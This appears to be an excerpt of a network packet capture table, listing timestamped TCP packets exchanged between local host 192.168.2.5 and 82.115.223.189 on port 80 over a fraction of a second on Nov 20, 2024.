                                          Nov 20, 2024 07:48:03.563349009 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563383102 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563426018 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563435078 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.563476086 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563518047 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.563529968 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563563108 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563599110 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563606977 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.563633919 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563682079 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.563689947 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563720942 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563755035 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563776970 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.563795090 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563827991 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563842058 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.563864946 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563910007 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.563915968 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563947916 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563981056 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.563993931 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.564013958 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564047098 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564055920 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.564080000 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564112902 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564125061 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.564150095 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564184904 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564196110 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.564218044 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564251900 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564260006 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.564280033 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564315081 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564321041 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.564347982 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564380884 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564390898 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.564414024 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564444065 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564454079 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.564476967 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564508915 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564517975 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.564544916 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564577103 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564588070 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.564610004 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564641953 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564655066 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.564675093 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564707994 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564712048 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.564740896 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564774036 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564776897 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.564807892 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564840078 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564847946 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.564874887 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564891100 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.564903975 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564914942 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.564937115 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564970016 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.564979076 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.565001965 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565036058 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565052986 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.565068007 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565102100 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565116882 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.565134048 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565166950 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565191031 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.565200090 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565232992 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565247059 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.565267086 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565300941 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565310001 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.565337896 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565371037 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565382004 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.565404892 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565440893 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565448999 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.565474033 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565506935 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565517902 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.565540075 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565574884 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.565582991 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.566905975 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.603632927 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.603679895 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.603738070 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.603781939 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.603782892 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.603836060 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.603840113 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.603872061 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.603885889 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.603905916 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.603940964 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.603950024 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.652296066 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.652369976 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.652379990 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.652429104 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.652462959 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.652473927 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.652517080 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.652570963 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.652575970 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.652606964 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.652641058 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.652653933 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.652693987 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.652728081 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.652740002 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.652761936 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.652803898 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.652808905 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.652858019 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.652890921 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.652925968 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.652926922 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.652977943 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.652982950 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653036118 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653072119 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653080940 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.653106928 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653156996 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.653157949 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653213024 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653242111 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653259993 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.653297901 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653342009 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.653351068 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653383017 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653418064 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653429031 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.653450966 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653502941 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.653502941 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653537035 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653572083 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653592110 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.653606892 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653644085 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653652906 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.653673887 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653723955 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.653728008 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653785944 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653822899 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653831005 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.653857946 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653891087 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653903961 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.653925896 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653959036 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.653971910 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.653994083 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654043913 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.654045105 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654081106 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654113054 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654125929 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.654165030 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654216051 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654217958 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.654252052 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654300928 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654301882 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.654335976 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654369116 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654381037 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.654406071 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654438019 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654448032 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.654473066 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654506922 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654516935 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.654541969 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654575109 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654593945 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.654609919 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654643059 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654663086 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.654676914 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654707909 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654720068 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.654742956 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654774904 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654788971 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.654810905 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654843092 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654853106 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.654879093 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654911995 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654926062 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.654947042 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654978991 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.654994011 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.655016899 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655050039 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655065060 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.655086040 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655118942 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655131102 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.655153990 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655185938 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655199051 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.655220985 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655253887 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655267000 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.655287981 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655332088 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.655345917 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655381918 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655415058 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655431986 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.655448914 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655483007 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655495882 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.655517101 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655550003 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655565023 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.655584097 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655616999 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655630112 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.655656099 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655683994 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655699968 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.655716896 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655750990 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655759096 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.655785084 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655818939 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655833006 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.655853033 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655884981 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655900002 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.655920029 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655952930 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.655963898 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.655986071 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.656019926 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.656030893 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.656053066 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.656086922 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.656100035 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.656121016 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.656153917 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.656184912 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.656198978 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.656219006 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.656229973 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.656255007 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.656289101 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.656301975 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.656321049 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.656353951 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.656363964 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.656388998 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.656433105 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.657143116 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.694379091 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.694431067 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.694468021 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.694489002 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.694504023 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.694544077 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.694552898 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.694580078 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.694617987 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.694627047 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.735094070 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.742768049 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.742841005 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.742872953 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.742892027 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.742928028 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.742975950 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.742988110 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743041039 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743086100 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.743096113 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743129015 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743181944 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743184090 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.743235111 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743268967 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743278027 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.743343115 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743395090 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743401051 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.743429899 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743463039 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743473053 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.743500948 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743545055 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.743560076 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743611097 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743644953 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743659973 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.743700027 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743733883 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743746996 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.743791103 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743837118 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.743841887 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743874073 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743908882 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743927002 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.743940115 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.743987083 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.743993044 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744031906 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744070053 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.744081974 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744113922 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744148016 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744162083 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.744180918 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744225025 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.744232893 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744270086 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744316101 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.744323969 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744374990 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744479895 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.744488955 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744544029 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744575977 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744585037 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.744609118 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744642019 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744653940 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.744676113 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744709015 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744720936 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.744744062 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744776964 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744786024 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.744816065 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.744859934 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.744864941 CET804970482.115.223.189192.168.2.5
